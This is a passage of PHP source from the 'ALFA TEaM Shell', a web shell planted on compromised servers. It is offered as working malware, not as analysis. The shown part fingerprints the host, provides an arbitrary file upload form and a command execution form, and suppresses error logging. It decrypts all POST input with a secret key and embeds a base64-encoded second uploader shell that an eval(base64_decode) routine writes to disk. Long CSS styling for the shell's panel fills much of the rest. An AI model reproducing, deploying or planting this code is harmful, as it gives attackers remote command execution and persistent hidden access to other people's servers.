648echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER ['SERVER_SOFTWARE'] . "</font><br>";
649echo "PHP Version: <font color=white>" . PHP_VERSION . "</font><br />";
650echo "PWD:<font color=#FFFFFF> " . str_replace("\\","/",@getcwd()) . "/<br />";
651echo "<b style='color: #7CFC00'>Safe Mode : $r<br>";
652echo"<font color=#7CFC00>Disable functions : </font>";
653$disfun = @ini_get('disable_functions');
654if(empty($disfun)){$disfun = '<font color="green">NONE</font>';}
655echo"<font color=red>";
656echo "$disfun";
657echo"</font><br>";
658echo "<b style='color: #7CFC00'>Your Ip Address is : </font><font color=white>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";
659echo "<b style='color: #7CFC00'>Server Ip Address is : </font><font color=white>".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')."</font><br><p>";
660echo '<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
661echo 'CWD: <input type="text" name="cwd" value="'.str_replace("\\","/",@getcwd()).'/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>';
662if(isset($_FILES['file'])){
663if(@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['file']['name'])){echo '<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>'; }
664else{echo '<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>'; }
665}
666echo '<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form>
667<hr><pre>';
668if(isset($_POST['command_solevisible'])){
669if(strtolower(substr(PHP_OS,0,3))=="win")$separator='&';else $separator=';';
670$solevisible = "cd '".addslashes(str_replace("\\","/",@getcwd()))."'".$separator."".__ZGVjb2Rlcg($_POST['command_solevisible']);
671echo alfaEx($solevisible);
672}
673echo'</pre>
674</body></html>';
675exit;}
676@error_reporting(E_ALL ^ E_NOTICE);
677@ini_set('error_log',NULL);
678@ini_set('log_errors',0);
679@ini_set('max_execution_time',0);
680@ini_set('magic_quotes_runtime', 0);
681@set_time_limit(0);
682if(function_exists('set_magic_quotes_runtime')){
683@set_magic_quotes_runtime(0);
684}
685foreach($_POST as $key => $value){
686if(is_array($_POST[$key])){
687$i=0;
688foreach($_POST[$key] as $f) {
689$f = trim(str_replace(' ', '+',$f));
690$_POST[$key][$i] = decrypt_post($f, _AlfaSecretKey());
691$i++;
692}
693}else{
694$value = trim(str_replace(' ', '+',$value));
695$_POST[$key] = decrypt_post($value, _AlfaSecretKey());
696}
697}
698$default_action = 'FilesMan';
699$default_use_ajax = true;
700$default_charset = 'Windows-1251';
701if(strtolower(substr(PHP_OS,0,3))=="win")
702$GLOBALS['sys']='win';
703else
704$GLOBALS['sys']='unix';
705$GLOBALS['home_cwd'] = @getcwd();
706if($_POST["a"] != "GetPathHistory"){
707 if($_SESSION[__LAST_CWD__]!=$_POST['c']){
708 $_SESSION[__PATH_HISTORY__] = $_SESSION[__LAST_CWD__];
709 }
710}
711$GLOBALS["need_to_update_header"] = "false";
712if(isset($_POST['c'])){
713if(!@chdir($_POST['c'])){
714 $GLOBALS['glob_chdir_false'] = true;
715}
716}
717$GLOBALS['cwd'] = (isset($_SESSION[__LAST_CWD__])&&$_SESSION[__LAST_CWD__]!=''&&!isset($_POST['c'])?$_SESSION[__LAST_CWD__]:@getcwd());
718if(!@is_dir){$GLOBALS['cwd'] = @getcwd();}
719if($GLOBALS['sys'] == 'win'){
720$GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);
721$GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);
722$_SESSION[__PATH_HISTORY__] = str_replace("\\", "/", $_SESSION[__PATH_HISTORY__]);
723}
724if($GLOBALS['cwd'][strlen($GLOBALS['cwd'])-1] != '/' )$GLOBALS['cwd'] .= '/';
725function alfaGetPathHistory(){echo (isset($_SESSION[__PATH_HISTORY__])&&!empty($_SESSION[__PATH_HISTORY__])?$_SESSION[__PATH_HISTORY__]: $GLOBALS['home_cwd']);}
726function alfahead(){
727if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir() {foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS['__file_path'], '');if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}}
728$GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';
729$alfa_uploader = '$x = base64_decode("'.$GLOBALS['__ALFA_SHELL_CODE'].'");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);';
730define("ALFA_UPLOADER", "eval(base64_decode('".__ZW5jb2Rlcg($alfa_uploader)."'))");
731define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace('\\','/',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable('.')?'.':false)) : false));
732if(!isset($_POST['ajax'])){
733function Alfa_GetDisable_Function(){
734$disfun = @ini_get('disable_functions');
735$afa = '<span class="header_show_all">All Functions Accessible</span>';
736if(empty($disfun))return($afa);
737$s = explode(',',$disfun);
738$s = array_unique($s);
739$i=0;
740$b=0;
741$func = array('system','exec','shell_exec','proc_open','popen','passthru','symlink','dl');
742$black_list = array();
743$allow_list = array();
744foreach($s as $d){
745 $d=trim($d);
746 if(empty($d)||!is_callable($d))continue;
747 if(!function_exists($d)){
748 if(in_array($d,$func)){
749 $dis .= $d." | ";$b++;
750 $black_list[] = $d;
751 }else{
752 $allow_list[] = $d;
753 }
754 $i++;
755 }
756}
757if($i==0)return($afa);
758if($i <= count($func)){
759$all = array_values(array_merge($black_list, $allow_list));
760return('<span class="disable_functions">'.implode(" | ", $all).'</span>');
761}
762return('<span class="disable_functions">'.$dis.'</span><a href=javascript:void(0) onclick="g(\'GetDisFunc\',null,\'wp\');"><span class="header_show_all">Show All ('.$i.')</span></a>');
763}
764function AlfaNum(){
765$args = func_get_args();
766$alfax = array();
767$find = array();
768for($i=1;$i<=10;$i++){
769$alfax[] = $i;
770}
771foreach($args as $arg){
772$find[] = $arg;
773}
774echo '<script>';
775foreach($alfax as $alfa){
776if(in_array($alfa,$find))
777continue;
778echo 'alfa'.$alfa."_=";
779}
780echo '""</script>';
781}
782if(empty($_POST['charset']))
783$_POST['charset'] = $GLOBALS['default_charset'];
784$freeSpace = function_exists('diskfreespace')?@diskfreespace($GLOBALS['cwd']):'?';
785$totalSpace = function_exists('disk_total_space')?@disk_total_space($GLOBALS['cwd']):'?';
786$totalSpace = $totalSpace?$totalSpace:1;
787$on="<span class='header_on'> ON </span>";
788$of="<span class='header_off'> OFF </span>";
789$none="<span class='header_none'> NONE </span>";
790if(function_exists('ssh2_connect'))
791$ssh2=$on;
792else
793$ssh2=$of;
794if(function_exists('curl_version'))
795$curl=$on;
796else
797$curl=$of;
798if(function_exists('mysql_get_client_info'))
799$mysql=$on;
800else
801$mysql=$of;
802if(function_exists('mssql_connect'))
803$mssql=$on;
804else
805$mssql=$of;
806if(function_exists('pg_connect'))
807$pg=$on;
808else
809$pg=$of;
810if(function_exists('oci_connect'))
811$or=$on;
812else
813$or=$of;
814if(@ini_get('disable_functions'))
815$disfun=@ini_get('disable_functions');
816else
817$disfun="All Functions Enable";
818if(@ini_get('safe_mode'))
819$safe_modes="<span class='header_off'>ON</span>";
820else
821$safe_modes="<span class='header_on'>OFF</span>";
822$cgi_shell="<span class='header_off' id='header_cgishell'>OFF</span>";
823if(@ini_get('open_basedir')){
824$basedir_data = @ini_get('open_basedir');
825if(strlen($basedir_data)>120){
826$open_b=substr($basedir_data,0, 120)."...";
827}else{
828$open_b = $basedir_data;
829}
830}else{$open_b=$none;}
831if(@ini_get('safe_mode_exec_dir'))
832$safe_exe=@ini_get('safe_mode_exec_dir');
833else
834$safe_exe=$none;
835if(@ini_get('safe_mode_include_dir'))
836$safe_include=@ini_get('safe_mode_include_dir');
837else
838$safe_include=$none;
839if(!function_exists('posix_getegid'))
840{
841$user = function_exists("get_current_user")?@get_current_user():"????";
842$uid = function_exists("getmyuid")?@getmyuid():"????";
843$gid = function_exists("getmygid")?@getmygid():"????";
844$group = "?";
845}else{
846$uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array("name"=>"????", "uid"=>"????");
847$gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array("name"=>"????", "gid"=>"????");
848$user = $uid['name'];
849$uid = $uid['uid'];
850$group = $gid['name'];
851$gid = $gid['gid'];
852}
853$cwd_links = '';
854$path = explode("/", $GLOBALS['cwd']);
855$n=count($path);
856for($i=0; $i<$n-1; $i++) {
857$cwd_links .= "<a class='header_pwd' href='javascript:void(0);' onclick='g(\"FilesMan\",\"";
858for($j=0; $j<=$i; $j++)
859$cwd_links .= $path[$j].'/';
860$cwd_links .= "\")'>".$path[$i]."/</a>";
861}
862$drives = "";
863foreach(range('a','z') as $drive)
864if(@is_dir($drive.':\\'))
865$drives .= '<a href="javascript:void(0);" class="header_drive" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
866$csscode =' -moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';
867echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
868<html xmlns="http://www.w3.org/1999/xhtml">
869<head>
870<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
871<meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
872<link href="'.__showicon('alfamini').'" rel="icon" type="image/x-icon"/>
873<title>..:: '.$_SERVER['HTTP_HOST'].' ~ ALFA TEaM Shell - v'.__ALFA_VERSION__.' ::..</title>
874<link href="https://fonts.googleapis.com/css?family=Francois+One" rel="stylesheet">
875<style type="text/css">
876.hlabale {
877 color: #67ABDF;
878 border-radius: 4px;
879 border: 1px solid #27979B;
880 margin-left: 7px;
881 padding: 2px;
882}
883#tbl_sympphp tr {
884 text-align: center;
885}
886.editor-view {
887 position: relative;
888}
889.view-content {
890 position: absolute;
891 overflow-y: auto;
892 width: 100%;
893 height: 475px;
894}
895*::-webkit-scrollbar-track {
896 -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,0.3);
897 border-radius: 10px;
898 background-color: #000115;
899}
900*::-webkit-scrollbar{
901 width: 10px;
902 background-color: #000115;
903}
904*::-webkit-scrollbar-thumb {
905 border-radius: 10px;
906 -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);
907 background-color: rgb(30, 130, 181);
908}
909.editor-file-name {
910 margin-left: 29px;
911 margin-top: 4px;
912 overflow: hidden;
913 text-overflow: ellipsis;
914 white-space: nowrap;
915}
916.editor-icon {
917 position: absolute;
918}
919.is_active {
920 background: rgba(49, 55, 93, 0.77);
921 border-radius: 10px;
922}
923.history-list {
924 height: 88%;
925 overflow-y: auto;
926}
927#editor-minimized,#cgiloader-minimized {
928 display: block;
929 position: fixed;
930 right: -30px;
931 width: 30px;
932 height: 30px;
933 top: 30%;
934}
935.minimized-wrapper {
936 position: relative;
937 background: rgb(14, 48, 74);
938 width: 44px;
939 height: 167px;
940 cursor: pointer;
941 border-bottom-left-radius: 5px;
942 border-top-left-radius: 5px;
943}
944.minimized-text {
945 transform: rotate(-90deg);
946 color: wheat;
947 font-size: x-large;
948 display: inline-block;
949 position: absolute;
950 right: -51px;
951 width: 129px;
952 top: 50px;
953 border-top-left-radius: 4%;
954 height: 56px;
955 padding: 3px
956}
957.close-button,.editor-minimize {
958 height: 26px;
959 width: 38px;
960 right: 7px;
961 background: rgb(29, 86, 115);
962 cursor: pointer;
963 position: absolute;
964 box-sizing: border-box;
965 line-height: 50px;
966 display: inline-block;
967 top: 17px;
968 border-radius: 100px;
969}
970.editor-minimize {right: 50px;}
971.close-button:before,.close-button:after,.editor-minimize:before {
972 transform: rotate(-45deg);
973 content: "";
974 position: absolute;
975 top: 63%;
976 right: 6px;
977 margin-top: -5px;
978 margin-left: -25px;
979 display: block;
980 height: 4px;
981 width: 27px;
982 background-color: rgba(216, 207, 207, 0.75);
983 transition: all 0.25s ease-out;
984}
985.editor-minimize:before{
986 transform: rotate(0deg);
987}
988.close-button:after {
989 transform: rotate(-135deg);
990}
991.close-button:hover:before,.close-button:hover:after,.editor-minimize:hover:before{
992 background-color: red;
993}
994.close-button:hover,.editor-minimize:hover{
995 background-color: rgba(39, 66, 80, 0.96);
996}
997#editor,#cgiloader {
998 display: none;
999 position: fixed;
1000 top: 0;
1001 width: 100%;
1002 height: 100%;
1003}
1004.editor-wrapper {
1005 width: 100%;
1006 height: 100%;
1007 position: relative;
1008 top: 1%;
1009}
1010.editor-header {
1011 width: 97%;
1012 background: rgba(21, 66, 88, 0.93);
1013 height: 37px;
1014 margin-left: 13px;
1015 position: relative;
1016 border-top-left-radius: 15px;
1017 border-top-right-radius: 15px;
1018}
1019.editor-path {
1020 position: absolute;
1021 font-size: x-large;
1022 margin-left: 10px;
1023 top: 6px;
1024 color: springgreen;
1025}
1026.editor-modal {
1027 position: relative;
1028 top: 0;
1029 background-color: rgba(0, 1, 23, 0.95);
1030 height: 90%;
1031 margin-left: 20%;
1032 margin-right: 2%;
1033 border: 2px #0e304a solid;
1034}
1035.editor-explorer {
1036 width: 19%;
1037 height: 90%;
1038 background-color: rgba(0, 1, 23, 0.94);
1039 position: absolute;
1040 z-index: 2;
1041 left: 1%;
1042 border: 2px rgb(14, 48, 74) solid;
1043}
1044.editor-controller {
1045 position: relative;
1046 top: -13px;
1047}
1048.file-holder {
1049 position: relative;
1050 width: 100%;
1051 height: 30px;
1052}
1053.file-holder > .history {
1054 position: absolute;
1055 color: rgb(3, 179, 163);
1056 cursor: pointer;
1057 left:5px;
1058 font-size: 18px;
1059 font-family: sans-serif;
1060 width:89%;
1061 height:100%;
1062 z-index: 3;
1063 border-radius: 10px;
1064 transition: background-color 600ms ease-out;
1065}
1066.file-holder > .history-close {
1067 display: block;
1068 opacity: 0;
1069 position: absolute;
1070 right: 2px;
1071 width: 20px;
1072 top: 4px;
1073 text-align: center;
1074 cursor: pointer;
1075 color: white;
1076 background: red;
1077 border-radius: 100px;
1078 font-family: monospace;
1079 z-index: 10;
1080 transition: opacity 600ms ease-out;
1081 font-size: 15px;
1082 height: 19px;
1083}
1084.file-holder > .history:hover {
1085 background-color: #646464;
1086}
1087.editor-explorer > .hheader {
1088 position: relative;
1089 color: rgb(20, 255, 7);
1090 border-bottom: 2px rgb(32, 106, 162) solid;
1091 text-align: center;
1092 font-family: sans-serif;
1093 margin-bottom: 10px;
1094 height: 55px;
1095}
1096.editor-search {
1097 position: absolute;
1098 bottom: 7px;
1099 left: 31px;
1100}
1101.hheader-text {
1102 position: absolute;
1103 left: 8px;
1104 top: 2px;
1105}
1106.history-clear {
1107 position: absolute;
1108 right: 8px;
1109 top: 2px;
1110 cursor: pointer;
1111}
1112.editor-body {
1113 position: relative;
1114 margin-left: 3px;
1115}
1116.editor-anim-close {
1117 '.showAnimation("editorClose").'
1118}
1119@keyframes editorClose {
1120 0% {
1121 transform: scale(1);
1122 opacity: 1;
1123 }
1124 100% {
1125 transform: scale(0);
1126 opacity: 0;
1127 }
1128}
1129.editor-anim-minimize {
1130 '.showAnimation("editorMinimize").'
1131}
1132@keyframes editorMinimize {
1133 0% {
1134 right:0px;
1135 opacity: 1;
1136 }
1137 100% {
1138 right: -2000px;
1139 opacity: 0;
1140 }
1141}
1142.editor-anim-show {
1143 '.showAnimation("editorShow").'
1144}
1145@keyframes editorShow {
1146 0% {
1147 right:-2000px;
1148 opacity: 0;
1149 }
1150 100% {
1151 right: 0px;
1152 opacity: 1;
1153 }
1154}
1155.minimized-show {
1156 '.showAnimation("minimizeShow").'
1157}
1158@keyframes minimizeShow {
1159 0% {
1160 right: -30px;
1161 opacity: 0;
1162 }
1163 100% {
1164 right: 0px;
1165 opacity: 1;
1166 }
1167}
1168.minimized-hide {
1169 '.showAnimation("minimizeHide").'
1170}
1171@keyframes minimizeHide {
1172 0% {
1173 right: 0px;
1174 opacity: 1;
1175 }
1176 100% {
1177 right: -30px;
1178 opacity: 0;
1179 }
1180}
1181.solevisible-text:hover {
1182 -webkit-text-shadow: 0px 0px 25px #00FF00;
1183 -moz-text-shadow: 0px 0px 25px #00FF00;
1184 -ms-text-shadow: 0px 0px 25px #00FF00;
1185 text-shadow: 0px 0px 25px #00FF00;
1186}
1187.update-holder {
1188 position: fixed;
1189 top: 0;
1190 background-color: rgba(0, 24, 29, 0.72);
1191 width: 100%;
1192 height: 100%;
1193}
1194.update-partner {
1195 width: 50%;
1196 position: relative;
1197 border-radius: 31px;
1198 height: 200px;
1199 background-color: rgba(3, 3, 41, 0.47);
1200 text-align: center;
1201 color: rgba(252, 253, 251, 0.88);
1202 margin-left: 25%;
1203 top: 23%;
1204 font-family: "Francois One", sans-serif;
1205}
1206.update-partner:hover {
1207-webkit-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
1208-moz-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
1209box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
1210}
1211.update-content {
1212 position: relative;
1213}
1214.update-content > a {
1215 text-decoration: none;
1216 position: absolute;
1217 color: rgba(103, 167, 47, 0.77);
1218 left: 24%;
1219 margin-top: 7%;
1220 font-size: 40px;
1221 font-family: "Francois One", sans-serif;
1222}
1223.update-close {
1224 position: absolute;
1225 right: 0;
1226 margin-right: 23px;
1227 top: 10px;
1228 font-size: 27px;
1229 background-color: #130f50;
1230 width: 5%;
1231 border-radius: 100px;
1232 cursor: pointer;
1233 border: 2px rgb(14, 38, 90) solid;
1234}
1235.update-close:hover {
1236 border: 2px #25ff00 solid;
1237 color: #FF0000;
1238}
1239.filestools {
1240 height: auto;
1241 width: auto;
1242 color: #67ABDF;
1243 font-size: 12px;
1244 font-family: Verdana,Geneva,sans-serif;
1245}
1246@-moz-document url-prefix() {
1247 #search-input {
1248 width: 173px;
1249 }
1250 .editor-path {
1251 top:3px;
1252 }
1253}
1254@keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}
1255@-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}
1256@-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}
1257@-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}
1258#alfaloader{'.$csscode.'width:100px;height:100px;}
1259#a_loader{'.$csscode.'width:150px;height:150px;position:fixed;z-index:999999;top: 42%;left: 45%;display:none;}
1260.ajaxarea{border:1px solid #0E304A;color:#67ABDF}#up_bar{background-color:red;width:0;height:2px;display:none;position:fixed;z-index:100000}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(http://solevisible.com/images/alfabg.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:'.alfa_getColor("header_values").';font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:'.($GLOBALS['DB_NAME']['show_icons']=='1'?'0':'1').'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;border:1px solid #0F0;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url('.__showicon('btn').');background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}
1261.foottable{width: 300px;font-weight: bold;'.(!@is_writable($GLOBALS['cwd'])?'}.dir{background-color:red;}':'}').'
1262.main th{text-align:left;}
1263.main a{color: #FFF;}
1264.main tr:hover{background-color:#646464;}
1265.ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }
1266.bigarea{ width:99%; height:300px; }
1267'.alfaCssLoadColors().'
1268</style>';
1269echo "<script type='text/javascript'>
1270var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
1271var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
1272var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
